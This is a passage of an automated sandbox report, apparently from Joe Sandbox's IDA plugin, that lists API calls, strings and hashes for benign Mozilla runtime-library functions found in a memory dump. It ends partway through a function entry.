Part of subcall function 6662CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6664B5EB,00000000), ref: 6662CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6662C863
std::_Facet_Register.LIBCPMT ref: 6662C875

Part of subcall function 6660B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6664B636,?), ref: 6660B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6662C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6662C8BC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: d3a739e44793af3a8f0d73eaacf2f5d24bf2ad6574dd65254df598f9315ac31f
Instruction ID: f97683f2ed7a3f51ce2adef9578dc2314311ca40b2d69d441bfa1eb39b134bb3
Opcode Fuzzy Hash: d3a739e44793af3a8f0d73eaacf2f5d24bf2ad6574dd65254df598f9315ac31f
Instruction Fuzzy Hash: 86119075A002199BCB04DFA5E89A8AE7FBBEFC9354B004129EA0797340DB309904CFE5

Function 665DEB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 665DEBB5

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6660D7F3), ref: 665DEBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6660D7F3), ref: 665DEBD6
free.MOZGLUE(?,?,?,?,?,?,6660D7F3), ref: 665DEBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6660D7F3), ref: 665DEC0E

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

GetLastError.KERNEL32(?,?,?,?,?,?,6660D7F3), ref: 665DEC1A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: 0abd5dd51770b395e39872b95f33f928a3f93add13ef890373293ee2fb39276e
Instruction ID: 8e34877b92854f6f7ead225ea66aa9b16167438dd810e2a646c249ea006712b0
Opcode Fuzzy Hash: 0abd5dd51770b395e39872b95f33f928a3f93add13ef890373293ee2fb39276e
Instruction Fuzzy Hash: 8011E9B1E043945BFB008A6CEC4676FBEA89F51758F144824E915E73C0E3B5DC048BE6

Function 66620180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 66620270
GetCurrentThreadId.KERNEL32 ref: 666202E9
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 666202F6
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6662033A

Strings

about:blank, xrefs: 6662020F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 2591c72571a976a7cc163fdefca890d0db9ca12a23b362d21af8b1d28ceb623c
Instruction ID: b8872a8280dfba7c116f40bd23140ac03ad69d5830d8b69955cad239677bebe6
Opcode Fuzzy Hash: 2591c72571a976a7cc163fdefca890d0db9ca12a23b362d21af8b1d28ceb623c
Instruction Fuzzy Hash: 0051B0B49002298FCB00DF59E991AAABBFAFF89324F504559C919A7341D731BD42CFD0

Function 6661E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6661E084,00000000), ref: 6661E137

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6661E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6661E1E9

Part of subcall function 666199A0: GetCurrentThreadId.KERNEL32 ref: 666199C1
Part of subcall function 666199A0: AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 666199CE
Part of subcall function 666199A0: ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 666199F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6661E13F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 6abcfbf3a95646683aa66cd1c200c7ea8151ec94b6c4d1a2b0ed8d931442e094
Instruction ID: 51c487dc8bbfe017704ae13941c2a26891be347760dfee5eec61096692946902
Opcode Fuzzy Hash: 6abcfbf3a95646683aa66cd1c200c7ea8151ec94b6c4d1a2b0ed8d931442e094
Instruction Fuzzy Hash: 2331F2B1A083419FD704EF6DE85126AFBE6AFD9708F04852EE8954B281EB70D905C792

Function 6660F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6660F480

Part of subcall function 665DF100: LoadLibraryW.KERNEL32(shell32,?,6664D020), ref: 665DF122
Part of subcall function 665DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 665DF132

CloseHandle.KERNEL32(00000000), ref: 6660F555

Part of subcall function 665E14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(665E1248,665E1248,?), ref: 665E14C9
Part of subcall function 665E14B0: memcpy.VCRUNTIME140(?,665E1248,00000000,?,665E1248,?), ref: 665E14EF

Part of subcall function 665DEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 665DEEE3

CreateFileW.KERNEL32 ref: 6660F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6660F523

Strings

\oleacc.dll, xrefs: 6660F4CB

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 3d1b57df737b108359c524a4649b7870c27a1a9ef855f1d2f73ad1825550fc4d
Instruction ID: beb7c4073d52cf2415b8f6ce80c14ed08a28a591742fc298127c989ffd154a55
Opcode Fuzzy Hash: 3d1b57df737b108359c524a4649b7870c27a1a9ef855f1d2f73ad1825550fc4d
Instruction Fuzzy Hash: FA41C3705087509FE725DF29E985A9AB7F5EFD4318F108A2CFA9083250EB30D949CB96

Function 66610210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 66610222
moz_xmalloc.MOZGLUE(0000000C), ref: 66610231

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6661028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 666102F7

Strings

@, xrefs: 666102D8

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: d2a78c4fc986fc40c8e5da061469aa016244775de9f79d7863a5f6239aa716e8
Instruction ID: a047bfef32306e45c72acfc9d2452a76c149e03fe4850b59651084714dd30936
Opcode Fuzzy Hash: d2a78c4fc986fc40c8e5da061469aa016244775de9f79d7863a5f6239aa716e8
Instruction Fuzzy Hash: 84318EB1A046118FEF54CF58E880A2ABBE2FF94714B14852DD96ADB341DB71EC11CBD1

Function 6661E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661E04F

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6661E057

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: caecfbc0dd5c65cee9a7a2d4b541ee91f190bd3b7cfc94f771d77e2468b2091a
Instruction ID: aecb8ac63d10c3b05e02735da077920fec982578fb2593349fa74b540d349e26
Opcode Fuzzy Hash: caecfbc0dd5c65cee9a7a2d4b541ee91f190bd3b7cfc94f771d77e2468b2091a
Instruction Fuzzy Hash: 0821F278A041588FDF04DF69F859AAEFBB6AF85309F044028E90AE7340DB31E915C7E1

Function 666374A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 66637526
__Init_thread_footer.LIBCMT ref: 66637566
__Init_thread_footer.LIBCMT ref: 66637597

Strings

kernel32.dll, xrefs: 66637557
UnmapViewOfFile2, xrefs: 66637552

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: d2148247c7b142a4b2a344a1888f0debdc6c861ddb2ac1eab1980edf584cb039
Instruction ID: 810cbd133a17edfeeaaa59bf098954426d9fa18c2b461c9d803e5f6225d4022d
Opcode Fuzzy Hash: d2148247c7b142a4b2a344a1888f0debdc6c861ddb2ac1eab1980edf584cb039
Instruction Fuzzy Hash: BB21F531A04121EBDB19CF6AFD56E5A3F67EBC6375B011028E506A7280DB31B811CA9E

Function 66637A10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 665EBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,66637A3F), ref: 665EBF11
Part of subcall function 665EBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,66637A3F), ref: 665EBF5D
Part of subcall function 665EBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,66637A3F), ref: 665EBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 66637A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 66637A7A

Part of subcall function 665E9830: free.MOZGLUE(?,?,?,66637ABE), ref: 665E985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 66637AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 66637AC8

Strings

df, xrefs: 66637AB0

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: df
API String ID: 3421697164-826125786
Opcode ID: d0bedad9b52ec6d423521bc7e69f66eff6ce676fb4b88c531d5a69e024c63196
Instruction ID: 84a7496669f0e78597eef6073cf3a8bfdf064fe2b97bdc8ea62ed33228c7544b
Opcode Fuzzy Hash: d0bedad9b52ec6d423521bc7e69f66eff6ce676fb4b88c531d5a69e024c63196
Instruction Fuzzy Hash: DB213C756043149FCB14DF19E895A9EBBE6FFC9314F04882DE95A87351CB30A909CBD2

Function 66637930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 665EBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,66637A3F), ref: 665EBF11
Part of subcall function 665EBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,66637A3F), ref: 665EBF5D
Part of subcall function 665EBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,66637A3F), ref: 665EBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 66637968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6663A264,6663A264), ref: 6663799A

Part of subcall function 665E9830: free.MOZGLUE(?,?,?,66637ABE), ref: 665E985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 666379E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 666379E8

Strings

df, xrefs: 666379D0

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: df
API String ID: 3421697164-826125786
Opcode ID: 2e7598ea4a9dbfd656c1c24b4232853c02928aa1b884f6f89cef7a45eefa92fd
Instruction ID: f70a9e10acff22928edb9df222a02bdd223e87d3f6f56f5312095c48d1b922c9
Opcode Fuzzy Hash: 2e7598ea4a9dbfd656c1c24b4232853c02928aa1b884f6f89cef7a45eefa92fd
Instruction Fuzzy Hash: B7215C756043149FCB04DF19E895A9EBBE6EFC9314F04882DE94A87351CB30AD09CBD2

Function 6663AB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,665FBFBD,.dll,00000000,00000000,00000000,665FBFBD), ref: 6663ABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6663ABD8

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6663ABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6663AC03

Strings

.dll, xrefs: 6663ABB4, 6663ABFA

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: aec4969ab15494656d3b8ee67910f774069f074b8127528f8ac9879f10c253c6
Instruction ID: 06ab401818c9dbbd6f26f4db3cc1009a5cdb34dc3c04e5efefd4d23a08ce2040
Opcode Fuzzy Hash: aec4969ab15494656d3b8ee67910f774069f074b8127528f8ac9879f10c253c6
Instruction Fuzzy Hash: D60192B2A0011A6FEF019E79EC45ABFBAAEEFC5350F054035FD05E3200E6759D5487A1

Function 6663A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665F770,-00000001,?,6664E330,?,665FBDF7), ref: 6663A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,665FBDF7), ref: 6663A7C2
moz_xmalloc.MOZGLUE(00000018,?,665FBDF7), ref: 6663A7E4
LeaveCriticalSection.KERNEL32(6665F770), ref: 6663A80A

Strings

accelerator.dll, xrefs: 6663A7BF

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 2cf2909624eb470ea0f74a031e867ccd0d79276872697e0c198370565ef6174a
Instruction ID: 8fdfda1b02905c4591769e0a692d34e0527a8aceeb65b9d5e138b97f7118c355
Opcode Fuzzy Hash: 2cf2909624eb470ea0f74a031e867ccd0d79276872697e0c198370565ef6174a
Instruction Fuzzy Hash: AC012CB56103649F9F04DF16F8C6D557BBAEBC9351705806AE9099B251DB70A800CFA1

Function 665DF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,665DEE51,?), ref: 665DF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 665DF0C2

Strings

Could not find CoTaskMemFree, xrefs: 665DF0E3
ole32, xrefs: 665DF0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 665DF0DC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 63786ea1a32246ffadcec19613cdf45965bcd94278cf6a2dc2f898568ae80bb2
Instruction ID: a7df62fdf2c998816d83326e52e8d605d6b86afe5460e6dd7ccfbe7d10abdb0a
Opcode Fuzzy Hash: 63786ea1a32246ffadcec19613cdf45965bcd94278cf6a2dc2f898568ae80bb2
Instruction Fuzzy Hash: 8EE0D8705483119BEF04AE6BBC2B6263BDF6BD3285304802DE603D2740EA60D050CE5D

Function 666373E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,665E434E), ref: 666373EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 66637404
FreeLibrary.KERNEL32(?,?,665E434E), ref: 66637413

Strings

user32.dll, xrefs: 666373E6
SetProcessDpiAwarenessContext, xrefs: 666373FE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: fdcc729072b0d1c4ea14d27aa0b892203444886b568759da1c89c1c2e84c6ab4
Instruction ID: c2c4e251247becde4c946ff25d9c511ab8dc0f800c73011ef08d04df9c3f6283
Opcode Fuzzy Hash: fdcc729072b0d1c4ea14d27aa0b892203444886b568759da1c89c1c2e84c6ab4
Instruction Fuzzy Hash: 1DE04F70501321DBE7106FA6F919702BEEDEB86381F048869EB85E3302E7B1E4108B54

Function 666100D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

